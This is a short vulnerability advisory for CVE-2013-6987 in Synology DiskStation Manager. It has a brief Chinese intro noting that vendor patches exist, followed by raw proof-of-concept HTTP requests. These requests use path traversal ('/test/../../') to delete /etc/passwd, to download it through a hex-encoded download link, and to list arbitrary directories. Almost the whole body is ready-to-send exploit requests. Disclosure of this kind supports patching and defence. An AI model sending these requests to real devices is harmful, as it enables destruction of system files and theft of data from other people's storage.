CVE ID:CVE-2013-6987
Synology DiskStation Manager 是第一个提供网络多任务处理用户接口的NAS操作系统。
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http:// www.synology.com
Following some examples ("test" is a valid folder name):
- Delete /etc/passwd
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
===========================================
- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================
2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd
- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1